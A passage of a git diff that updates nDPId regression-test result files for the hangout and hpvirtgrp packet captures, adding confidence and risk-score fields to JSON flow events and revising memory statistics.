 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1468516947751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1468516947751,"pkt":"CJ4BbNkmACFeRhcmCABFAACEs2cAACwRwp9KfYZ\/Clk9DUtp3FYAcAThAQEAVCESpEJmaHpqc2RpS0drd1gABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFKAHosL2sVKq2EKifFUwLylv3i3sgCgABLYwivQ="}
-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1468516948761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1468516948761,"pkt":"CJ4BbNkmACFeRhcmCABFAACEtXUAACwRwJFKfYZ\/Clk9DUtp3FYAcMuPAQEAVCESpEJ2bG8rRTlqWDZMSTAABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFD0l9HkkR5C8mDGwDSrC9i\/8E7pdgCgABPT5D+E="}
 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1468516949760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1468516949760,"pkt":"CJ4BbNkmACFeRhcmCABFAACEuNIAACwRvTRKfYZ\/Clk9DUtp3FYAcJ51AQEAVCESpEJFNlpieTl0eEswU3gABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFGvaO+U3jhYTDCbM5zzzk6bw5Z+5gCgABA724k8="}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1468516947751,"flow_last_seen":1468516965768,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1468516965768,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1468516947751,"flow_last_seen":1468516965768,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1468516965768,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 19/19
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4603588 bytes
-~~ total memory freed........: 4603588 bytes
-~~ total allocations/frees...: 99574/99574
+~~ total memory allocated....: 4688541 bytes
+~~ total memory freed........: 4688541 bytes
+~~ total allocations/frees...: 101164/101164
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 728 chars
-~~ json string avg len.......: 505 chars
+~~ json string max len.......: 837 chars
+~~ json string avg len.......: 558 chars
diff --git a/test/results/hpvirtgrp.pcap.out b/test/results/hpvirtgrp.pcap.out
index fe061b32b..e355f454a 100644
--- a/test/results/hpvirtgrp.pcap.out
+++ b/test/results/hpvirtgrp.pcap.out
@@ -3,57 +3,57 @@
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
